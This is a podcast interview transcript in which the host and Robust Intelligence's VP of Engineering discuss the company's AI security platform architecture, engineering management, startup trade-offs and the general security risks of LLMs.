Robust Intelligence VP Marco Sanvido: Securing LLMs
Kshitij:
Hey everyone, uh, I'm Kshitij, and welcome to another episode of Tractable. Today I have Marco with me, who's the VP of Engineering at Robust Intelligence. Robust Intelligence is a platform for real time AI security, including products to help with validation of AI models and data. We have a lot to talk about, so I'm really excited to have you here, Marco.
Marco: Uh, same here, very excited, and thank you for inviting me.
Kshitij: Of course. Yeah. So maybe just to dive right in, tell me a little bit about your journey before Robust Intelligence and kind of your career path leading up to where you are today.
Marco: I think we'll take the whole hour... I've been in the industry for a while.
So I started, you know, I did my PhD in Zurich where we work on autonomous vehicles and flying autonomous vehicles and we did a startup there. So my journey in startup land started long time ago. Then I moved to the US and started, you know, followed, all the technology trends in the Silicon Valley: starting from virtualization, solid state drives, Kubernetes, security, encryption.
I touched a little bit of everything. So I'm an old wolf.
Kshitij: Yeah. And I'm sure you've seen a lot of these trends kind of repeat in different words, so to speak. So one of the things I'm curious about is: what sort of technical challenges over that time have you enjoyed the most and where have you felt like it's the most engaging work for you?
Marco: So I thought about this question a long time when you sent me yesterday the question and I must admit that I touched many different technologies and technology trends, and each of them has interesting challenges. Everything is always nice to work on and it's always rewarding.
I wouldn't say there is one specific technology that I can highlight as something that I enjoy the most. What I enjoy the most is the memories of solving those problems as a team. Those build lifelong friendships and I think it's more valuable than anything else. You know, I can remember all the problems we had with all the startups and, and we, as a team got together and solved it.
If you ask me the detail about the technology problem we solved, I vaguely remember, but I remember who was there, you know, how, how long we worked and how excited we were when we found a solution. So those are the memories that are still very vivid today.
Kshitij: I think you mentioned, you know, working on things like virtualization and working on different storage technologies. Are there kind of patterns that you're seeing, other than the fact that, you know - you're working with all these great people - that keep popping up every time you face a technical challenge? Like, is there, is there something where you're like: "Oh, it's this again!" and now I know we're going to have to spend the next six months figuring this out because I've seen the story play out.
Marco: So in general, every boom in technology, you know, has been brewing for a long time, right? And then there is some ,you know, something who kicks it in makes it go viral.
Like, you know, virtualization, IBM had it for a long time and then VMware came along and then it spread everywhere. Kubernetes, you know, same there. Solid state drives also was technology was there for a long time. So there is something that sparks that, that momentum and picks up. LLM is the same situation, right?
LLMs were, you know, around for, for a while before OpenAI came and made them very popular.
They're bringing everybody super excited. Everybody jumps in, but then there is some, some reality, right? But some is a little bit hype. And so the challenge is always like filtering out the bypass and... you know low pass filter on that high volatility and really zone in on the real value that this new technology brings to the table.
Kshitij: Yeah. and, and I'm curious for your perspective, on specifically how that relates to AI today. So obviously AI has been around for a very long time. LLMs have been around for a very long time, but we're kind of seeing the uptick of the curve really in the past year, year and a half. Specifically as it comes to consumers, right?
Like enterprises have been excited about ML for probably decades. So give me a sense of... do you think this shift to consumer excitement is something technically novel? Or do you think it's just that the technology has been slowly building up and it's gotten to a threshold where, you know, it's warranted and it's not just gonna die down in six months and people are going to realize, well, we're just going to continue in some linear direction for the next two or three years.
Marco: I don't know. I think everybody agrees that this technology is here to stay. So there's no doubt about it. One thing that this technology in particular, sparked is that, that everybody's super excited because it's so well demo-able right? Right. If If you use DALL-E or if you use OpenAI or ChatGPT you get wowed immediately, right?
So you, it's like, holy, wow, that, that's, that's impressive, right? So I don't remember any other technology where you said, wow, right? Like, okay, I can, I mean, I'm impressed. I'm really amazed, right? The problem though, is that these technologies are fantastic to demo and you know, if it makes a mistake, we laugh about it.
Right? Yeah, but if you want to put it that in business critical applications, you know, you're not going to laugh if you make a mistake, right? You might be losing dollars, right? So, that's what we try to solve as a company: that particular problem. I think there will be, you know, the truth where these LLMs and new ML models will helpindustries and businesses.
In the consumer world, you know, now we have ChatGPT and slowly pick up more and more. But in the business world, we've used AI for a long time, right? Google was using AI for a very long time without us, right? But so the technology there is mature enough, right?
LLMs in particular come with such a wow factor, but also an easy way that they can, you know, have hallucinations. They can be toxic, right? They can make mistakes. And I think it will take a little while before they really enter into mainstream businesses, and companies like us are trying to help that transition. It will take a little bit of time.
Kshitij: Yeah. And maybe let's, let's talk a little bit about Robust Intelligence as a product offering. So one of the things you said is LLMs and in general new AI products are very demo able, but it's interesting because on the technical side, it feels like they're much less observable, right? So for the end consumer, it's like, great: you get a fancy generation output, but on the technical side, you have very little understanding of why it's producing the output it is and then how to kind of think about the risk factors involved in that. Obviously that's that's the sort of thing that that your platform is trying to solve today. So tell me a little bit about the product and then we'll kind of dive into the architecture and how the platform is built.
Marco: The platform essentially is a risk management platform for AI models. So we try to identify a security problem in the models and in the data set and elevate them and show them to the user and then to help them protect against those vulnerabilities. And especially because the observability is a bit complicated, right?
So you don't know what the LLM is doing. So you want to protect on the input and outputs of that model to make sure that it follows, you know, laws and that it is not hallucinating -- and protecting against all those errors is what we're trying to do.
Kshitij: Yeah, and so diving into the architecture, tell me how Robust Ingelligence is built and, you know, to the extent you can give us a sense of what are some of the interesting parts of the architecture today?
Marco: So when I joined - so the company is four year old, right - and when I joined, the team worked a lot and with a lot of know-how in how to test or red teaming those models and identify those risk and vulnerabilities. Right? And so they build a really fantastic package to identify those issues.
I call it that was the model and the engine. What the product is we're trying to build is the car around that engine, the core know-how. So the product has this engine that identifies those vulnerabilities and protect against those vulnerabilities.
And then the platform is the car around who then sells to the customer. The platform is a Kubernetes platform, so it's pretty standard - nowadays it's the standard - of how you develop SaaS applications, right? Ten years ago was totally different, right? Who knows in 10 years what the new platform will be.
But currently we're using quite standardized developmentand SaaS architecture to the platform. So as a Kubernetes platform with multiple microservices for the core functionality. The stress testing is running a dedicated node that we spin up using spot instances to reduce cost.
Those spot instances run for like a half an hour to an hour, depending on the complexity of the computation, and then they shut down. The core engine is mostly Python. Machine learning is a Python world, so that's mostly Python, but the rest of the system is Golang which is again, a kind of a standard way to develop SaaS applications nowadays.
Kshitij: Yeah, it's interesting because I think a lot of the parts you just mentioned, um, you know, in some sense could be used in any SaaS application, right? So, so this Kubernetes cluster, the spot instances, even the choice of the framework and language. Are there things that you think are specific to Robust Intelligence? Or, maybe to phrase another way, you know, you really want most things to be boring so that they're predictable and so that you can scale them.
But are there things where you're like, oh, we've put a lot of effort into this that I think is very different than other companies, or at least we've had to design our own custom solution because what we would get out of the box just just wouldn't work for us?
Marco: So the interplay between the control plane and the data plane, that's also common architecture in SaaS projects.
What's unique about us... the agent -- the data plane where the computation is done is, you know, that's a core of our company, right? That's the business logic of our company, right? Yeah, that's where we put a lot of effort making sure that that's reliable, and that's performing well and that we can deploy it at the customer. So that the customer can - you know we don't have access to the data - we're keeping the data secure and the computational costs are on the on the customer side as well. That's a little bit unique in that sense of the architecture, you know. Usually the control plane and data plane... the data plane is minimal, it's just a shim, just a small layer and then every computation is done in the control plane.
For us, that's a little bit reversed: our heavy computation is done on the data plane that we deploy to the customer side and then control plane is a bit more lightweight as visualization, you know... user management, security and so forth.
Kshitij: And I always wonder when the data plane or the agent deployed within the customer's VPC, when that has a lot of business logic: does that get hard to debug or update or really keep, you know, in a way, functioning in a way that you wanted to function? And then the second question I have is like: if something goes wrong in the customer's environment, let's say they cut off a security group or they run out of some quota on their end, they can't deploy it anymore.
Uh, does that ever cause headaches for your team? So, so maybe those are related in some sense.
Marco: You went straight to the pain , uh, yes, that's the... development gets a little bit harder because, you know, you want to develop locally on a machine. Now it's a distributed setting in your machine.
You want to make sure that that it works on your machine so that, you know, the development is accelerated or fast, but then once you need to merge your change, you want to test all potential combinations and you have multiple different combinations... you have different clouds that you want to support. You have differentversioning problems that you need to address.
So that gets very complicated very quickly. So that's definitely a headache. Customer support: yes, that's the usual problem. I think it's not unique to us - for everybody who deploys in a VPC, they have the same problem that they need to access the logs. They need to see the metrics.
They need to see what happens on the customer side, but the customer doesn't want to let you go in, right? But that's not a unique problem. The observability and debugging in that sense. And thank goodness, you know, there are plenty of tools to allow us to simplify that. But, yeah, definitely it's on our radar as a problem.
Kshitij: And so architecturally, you have the split of control plane and data plane. I don't know if that's exactly the axis, but how does the architecture of the actual stack dictate how teams are organized internally? Does it happen to align pretty closely to that?
Have you found kind of a more horizontal way to align teams with just capabilities?
Marco: So definitely, you know, that's Conway's law, right? Where your team structure defines your software structures. So that's 100 percent true--and our teams we are pretty small and co-located so those barriers are a bit less strong. The structure is aligned not totally with the current control plane and data plane split. As we grow, that will become more and more of an issue and we'll have, to structure based on that split to make sure that we can develop in isolation and be fast so that each team is individually fast and is not blocked by these barriers.
It's definitely on our radar, but as the team is small and is co-located, those barriers are a little bit not as strong as I said and we can change the structure of the architecture without having to modify the structure of the engineering teams too much. But as we grow, we'll become more and more important.
Kshitij: Kind of continuing on this idea of the data plane being in the customer's environment... one thing that I've seen kind of as a pattern is customers are more hesitant to see the value when they're running the compute, right? Even though all your core business logic, all the stuff that you all are doing, is ultimately the value of the product.
They're running some of the compute and they're also paying their cloud provider. Is that a problem you see where it's a little bit harder to communicate, you know, why you're paying Robust Intelligence what you are?
Marco: So the cost of the compute is not... usually, you know, our customers spend way more for other stuff than our.
So we are a drop in their bucket. It's not a pain point. What I appreciate is the fact that, you know, they are in control of all the data governance, right? For us, we don't need to go and access those, right? So it makes it way easier for them to deploy our system. On the computational side, we offer the - if that's a problem - we can run it for them, right?
We can bypass that problem. The biggest advantage is that they are in control of it. They can deploy. They know exactly what's going on. Nowadays, with SOC-2 and all of these security concerns, companies are more concerned about security than anyone 10 years ago, right?
So that makes a simple way for deployment for us.
Kshitij: And , I'm curious: is there any difference in terms of what architecture companies go with depending on their maturity? Is it that the larger of a company you are, the more you care about data governance. And so you really want it all tightly controlled within your stack.
And then early companies are just like: okay, fine. If it's a SaaS offering, it's a SaaS offering and we can check the boxes of security some other way.
Marco: Yeah, definitely. I think it's not more the size, but it's the vertical where the company is, right? So regulated industries: finance, insurance and healthcare...they are being regulated. So even a smaller company has to follow those regulations. So I would say that is even more important than the size of the company.
Kshitij: So thinking about the architecture, what are the biggest gaps today? Or, you know, what is the team working on improving?
And then also specifically: where are you spending most of your time in terms of guiding the team or providing support?
Marco: So in a startup, the biggest gap is always the one who helps you close the customer, right? So that's the biggest gap. So you're trying to always close it and find the right solution.
So there's always a balance between tech debt and gap. I can't pinpoint exactly what the pain point of all of the things are because we're, you know, based on the customer and based off where we are, we have different gaps and then we work very fast to close gap as they come in.
There were some architecture choices that were done like two or three years ago that might have been done differently if you start from scratch right now. But those are different, you know - that's the standard startup problem, right? If you knew all the problems at the beginning, you could have done it differently now.
But what I spend most of my time is... I'm a strong believer that a great product comes from great engineers, right? So the only thing that I can do is to make sure that the engineers have a fantastic - are supported - and have a fantastic environment to develop. So that means supporting them with the best tools, making sure that the CI/CD pipeline is effective, making sure that the collaboration works, that people are doing... you know there is energizing and de energizing work, right? So I would balance that so that the team is effective and efficient. So that's what I'm spending most of my time on
Kshitij: Are there specific metrics that you look at to try to gauge...you know, are people, is your engineering team engaged or are they being efficient? You know, for example, I've heard some folks really looking at review time on pull requests, right? So that's maybe one metric of: are people getting back to each other quickly, or are they just spending most of their time blocked and waiting on others? Are there metrics like that that you actively look at, or do those just get gamed over time? So you're like, you know, it's more of a gut feeling.
Marco: So there was a famous article floating around the webs about how to measure performance. I think McKinsey tried to do something and they go really bad press about that. But I totally believe that the most important thing that people do, especially at a startup, is impact.
So how they impact... how do they move the needle, right? Could be one single line of code, right? And the impact is pretty, you know, there is not a metric that you measure, but you kind of know, right? Somebody is moving the needle in the right direction of the company... knows the important problems, knows the priority, knows what is important to the company at that particular point in time.
You know, it's pretty easy to spot who is moving the needle and who is more of a supporting role. All the metrics that you mentioned is like debugging: you look at logs to see where the problems are, right? But you're not looking at the logs to see how your software is working, right?
Commits... PR reviews... all the stuff is if somebody is not doing a lot of impact in the company, you can kind of debug and find problems and root cause the problem. The goal is always to make everybody as productive as can be.
I think everybody has real potential. When we hire people, we believe we hire because we believe they have great potential. So we need to make sure that they are supported and can be as effective... as productive as they can, right? People go through phases, too, right? So there's one where somebody is really is really productive.
And, you know, something happens... the kids are up at night the whole night. And life is not a straight line, right? So we have to adapt for that as well. One thing on the metrics side that you mentioned... I just started... I tried in the recent quarter to measureengineering, effectiveness or engineering - how can I say -, maturity. There are some levels and there is a organization engineering X that kind of published this survey on a set of metrics that you can measure your engineering org against. I'm just trying to do that to get a level or sense of where we are on a maturity level of engineering org so that doesn't measure people's performance; it is a measure of you as an org.
What can you do to be even more mature, move faster, and support engineering or to be more effective? So I just started doing that. I'm trying to collect the results right now. So, so yeah, a surprise when the numbers comes in, but I think looking at it, I got a good feeling that there is a good balance of really useful metrics that can can help guide the engineering org.
Kshitij: One of the things you said was that you try to kind of look at balancing between what the product needs to fill customer needs, as well as, you know, the roadmap you have and the things you've planned for the year or a quarter, let's say, right? So how do you think about how that affects engineering engagement?
Because you know one of the narratives is lots of people want to work on exciting new things and your roadmap that's really going to contribute new things to the product. But the reality of startup life, as you're saying, is there's things customers want and you need to fill those gaps. Sometimes those are not going to be the most exciting.
How are you going to strike that balance? And do you think that has an impact on the engagement of the engineers who are working on just kind of enterprise readiness things again and again, or even just small features that maybe don't seem that exciting at the end of the day to everyone who's using the product?
Marco: I think the people who join a startup are people who are looking for that excitement and that adrenaline rush of helping customers. I think that's already kind of self selecting a little bit. People want to work with customers, help them out, right? You have to find a balance also between, you know, you cannot just work for the customer or you become a professional services company, right?
So you balance between making the customer happy and a long term vision of the company and making sure that all the solutions that you're bringing for the particular customer have impact on the long term plan, right? Otherwise, you shouldn't do that, right? You should say: I'm not going to do that, right?
So you have to find a balance. Then there is the other thing is the balance is as you move very fast... Because as a startup, you know, the only advantage as a startup you have against big companies is that we're moving way faster than they can, right - yeah, for all the reasons, you know, we can move way faster than them.
That's why startups have a competitive advantage. By moving fast, you're creating a lot of dust behind you, right? And that dust has to settle somehow. And sometimes you have to go and clean it up. So that's always a balance. When you decide what you have to do next, you have to choose, you know: customer, high customer, critical issues, long term vision, like big roadblocks, things that you're working on and then cleaning up a little bit the dust that that you left behind over time. And sometimes, you know... one of the startups I worked before we built so much dust behind that we had to start a parallel team that was basically writing the v2 while we're still shipping v1, but then they knew that in six months v2 has to replace v1.
So yeah, we had to do that because, you still have to sell the product. That's the only rare situation where we have to do this. Sometimes you can do it incrementally and change the engine while the airplane is flying.
Kshitij: One of the unique positions that I think you all are in is having started a few years ago.
I'm sure the company has kind of seen a shift in the industry because I imagine the AI security landscape or even just generally working with customers who care a lot about AI has changed a lot since the introduction of LLMs. What's kind of your perspective on that? How have companies or even just industry practices changed over the last couple of years?
Marco: So the good news for Robust Intelligence, like when the company was started four years ago, you know, the founders had the fantastic vision. The founders had a fantastic vision that this as a problem was coming only more and more important, right? So you know, yesterday the White House announcement, was just preaching to the choir for us.
But there's been a shift, quite dramatic, in the past years on a company leveraging AI. Before that, a lot of company were using AI, you know, and they had data science teams. They were building their own models, right? And they put it in production and we've seen a lot of successes and companies doing really well by following that path. With this boom of LLMs, what changes that now this data science system - and also because of the economy situation, right - some companies are shifting from building their own model to leverage foundational models, right?
So the idea is: why should I build my own when I can just build my application on top of this foundational model that are incredibly capable of doing things? So we have seen that shift. Personally, I believe that at some point people will move back because, you know, foundational model is like a hammer and everything is a nail.
But there will be probably smaller models, better models, to handle some of the particular problems that companies have but we have seen the transition. Luckily for us, you know, for us, we're testing models. If the model is built by a company or is a foundational model...for us, doesn't change much, right?
The vision was solid and robust enough to serve us..not survive, but, you know, be useful for both situations. So, yeah, we're in a good spot in that sense, but we have seen that transition quite dramatically in the people we're talking to.
Kshitij: And I imagine the pain point is actually much worse because if you're not building the model, you pragmatically have less experience understanding the model and understanding its limitations and how it's going to act in certain situations.
Probably what I'm guessing is that the level of experience with the model has decreased dramatically as you've kind of outsourced a lot of the early kind of training of it. And maybe now all you're doing either is nothing and just prompt engineering or maybe fine tuning, but you don't have the depth of experience that maybe a company did two years ago.
Is that, is that right?
Marco: That, that's totally right. Yeah. Building a model is not a trivial... you know, it's not trivial. So you have to have the data, you have to train it and verify and make sure that the model is doing the right thing. So it takes a lot of effort, right?
And the people building those kind of understand the model and have confidence that the model is doing what it's supposed to do. When you're leveraging somebody else's model, you know, you can test it a little bit, but you have to have the trust that the model is doing the right thing all the time.
Yeah, that's where we try to solve that, right? We come in and build tools that allow you to build that confidence, allow you to build that trust in the external models so that business critical applications... you are not you know, you're, you're not making mistakes.
Kshitij: And do you think that changes the overall security threat level?
Because one story I can imagine is everyone's using these models, but these models have been through a bunch of exercises where they've been stress tested, and there's a lot of hard work being put into locking them down. On the other hand, they're much more powerful, right, than maybe a model someone would have trained two years ago, and so a little bit harder to kind of scope what the security risks are.
You know, on balance, do you think we're in a worse place or a better place given given how the ecosystem has shifted?
Marco: I think it's worse, right? Because LLMs are so capable of, right? So it's simply easier to kind of find holes and bypass them. That's why I think what we're doing is extremely important to lock down those LLMs to make sure that they're doing what they're supposed to do.
And that, by design, those LLM can do a lot of things and, you know, by design you can try to abuse them, right? Because they can do more than what they're supposed to do, right? If you build a model that give you, you know, predicts, you know, let's say the house prices or predicts if somebody's a good hire or not, right?
An attacker could try to make him do the wrong answer, right? But they cannot try to make it toxic or extract PII data. You can't do that stuff right? With LLM, you know, you can write... an attacker could force your LLM to write code that executes and does something into your network, right?
So the surface attack is way way bigger in the LLM.
Kshitij: Do you think then that most people still underestimate the security risks of LLMs? And maybe as a corollary, do people underestimate the power and creativity of the LLMs? Or where do you think we are on that spectrum?
Marco: I think there is a binomial distribution. There are people who are really, really understanding the problems and really know the potential and the real impact of this, right? That's why there are, you know, there are people very concerned with this and trying to deploy a solution like ours or the White House, you know, with the executive order, right?
And then there are people who think, oh: it's just a new toy. You know, I can only... like yesterday I went to a presentation by somebody. "They just, they just do language, right? It's just a glorified dictionary." I was like, you're reducing that too much, right?
Because they can execute code right in some settings. They can really, be powerful if they're not handled correctly. So I think there are people who really understand it and people kind of... they are not fully grasped. Yeah. They're dismissing it.
Kshitij: So let's talk a little bit about how you all use LLMs internally. So obviously you're supporting the ecosystem in very important ways, but what's the internal use case for LLMs? How has that picked up in the engineering org or maybe across the company?
Marco: So obviously, you know we are an AI company, so if we don't embrace LLMs right, uh, who else will?
With a security, eye on it, right? But we use code assist generation quite heavily internally. It goes back to the engineering discussion, right? So I think it's a tremendous value to the engineering team. You know, it reduces the amount of, you know, when I spoke about energizing and de-energizing work? It reduces the amount of de-energizing work.
Like people writing tests, for example. It's always been, you know, as an engineering manager, it's always: "did you write the test for that?" I do it very often, right? Now we do that with the generative assistant. I don't know the name of the company we're using, but they're really, really helpful.
You say: write me a test for that, and boom, it gives you the skeleton and you're ready to go. So I think that's definitely fantastic use of that technology. When he makes mistakes, because he makes mistakes and sometimes funny mistakes, you can spot them quickly and fix them, right?
So I think it's a perfect use of that technology internally. And then we leverage LLMs for a bunch of things internally as well. Helping us debug, helping us to drive some of our protection and so forth. So yeah, we are...LLMs, we're spending a lot of money on it.
Kshitij: One thing I always found interesting about that, Code output use cases. On one hand, it's beneficial that it's outputting code that you can observe. You can see what mistakes it's making and you can fix them. On the other hand, let's say you had more trust in what it was doing. It doesn't need to output something that you can read, right?
Like let's say you could formally just verify that the tested it wrote tested the functionality you want, and you know it's outputting some. compiled code or some artifact that you can't inspect. Do you think we're eventually going to get there or do you think we're always going to be outputting like human verifiable code and something that's, you know, in characters that we can understand?
Marco: No, we are going there, right?
Where the LLM will spit out code and then nobody's checking it, right? Yeah, thank goodness, you know, we have a lot of history about checking code, which is compiler and static analyzer and so that can give you know viral scanner that can give confidence that what LLM spit out is not dangerous, right?
So I think we're going to get there. I think though that would be mostly for the... I would say the boundary code like all the last mile connections like doing the integration with reading the logs from Datadog or those last mile connection where you have APIs and you know how to write them. It's just typing and LLMs, I think, can do it very well and will do it very well.
The core components, like what we are doing, you know, there's a lot of creativity that goes into it. A lot of thinking. LLMs can assist you, give maybe the initial step of the idea. But if you want to be original, you still need , manpower to do that. And also I believe that, I forgot to say that, but if everybody has it, nobody has it.
So as a competitive advantage, right? If you're building a startup, especially a startup where we are building something state of the art new. If you leverage LLMs to build the core of your company... then, you know it's a little bit shaky ground because everybody has it, right?
So it's not unique. So that's why I believe the core will still be forever, I believe, will be not auto generated but will manually be created through creativity.
Kshitij: And the use case I'm thinking of exactly like you said is at the boundary where. If you want an LLM to change some copy on your marketing site... one very local implementation is, you know, it outputs a pull request.
Someone has to go and merge it or look at the CSS it generated, but none of that really matters, right? It can just do whatever it wants and no one ever has to look at the code it output. As long as the website looks good, then you're done.
Marco: I totally agree. Yeah. Those are, yeah.
And also where the mistakes are not fatal, right? Where the mistakes are easily undoable, right? So I think for that stuff... LLMs will be a fantasticaccelerator for what you're doing, right, as a startup. For the core, we're far away from LLMs being there and you know, everybody says AGI and if AGI is there, everybody will have AGI.
So what's the competitive advantage for a startup? So that's why I still believe that to be successful, a startup has to do something that is really fundamental and state of the art. No LLM can do that.
Kshitij: Okay, great. To wrap us up, what are you most excited about let's say in the coming few years, whether it's at Robust Intelligence or maybe just as an industry on the AI side? What sort of technical advancement are you most looking forward to?
Marco: Definitely, you know, I want to see where exactly we end up in the hype and where we see productivity and LLM having a humongous impact.
I believe we are on the tip of the iceberg right now. We've seen - I've never seen a technology move so fast, right? Every day I go on Twitter and I see something new, a new paper or a new discovery or something that's like mind blowing how fast we're moving.
So that's excited me. I've been in startups for, for quite a few years now and it's always a journey. That's the thing that excites me the most, right, is an adventure. The goal is not to have a fantastic exit. Obviously, you know, it's a lottery ticket. We hope it's fantastic.
But it's the journey right? It's the memory you make, the friendships you make along the way. For all the start ups I've been in, I've made a ton of friendships. I had a ton of fun. It's always been a fond memory of all those adventures. You know, even if the company didn't succeed, right?
But it's been always fun and nothing is more rewarding than working with fantastic people in a small team or solving something that is unique.
Kshitij: Well, maybe that's the one definite positive output is that with... these LLMs and just generally AI technology, it does seem like there's gonna be more startups, right?
There's gonna be more small teams who are able to build products and bring products to market. And so whether or not there's a hype cycle and all of these companies exit exactly in the way that they want... there will be more companies out there and trying to build better products.
Hopefully bringing them to consumers.
Marco: Yeah, super exciting. The number of startups has been built around these new technologies is impressive. I've never seen - maybe in 2000, you knowwhen the Internet really boomed, right? We saw a little bit of over, you know investment, right?
I believe we are in a similar situation where, you know, some funding goes to start up that the business model might be not really solid, but you have to try 100 things to make one successful, right? So I think exciting things are ahead of us for sure.
Kshitij: Awesome. Well, on that note, thanks Marco for coming on the podcast today and really appreciate your time.
Marco: My pleasure. My pleasure. Hope this was interesting and not too boring. Yeah, thanks again for inviting me.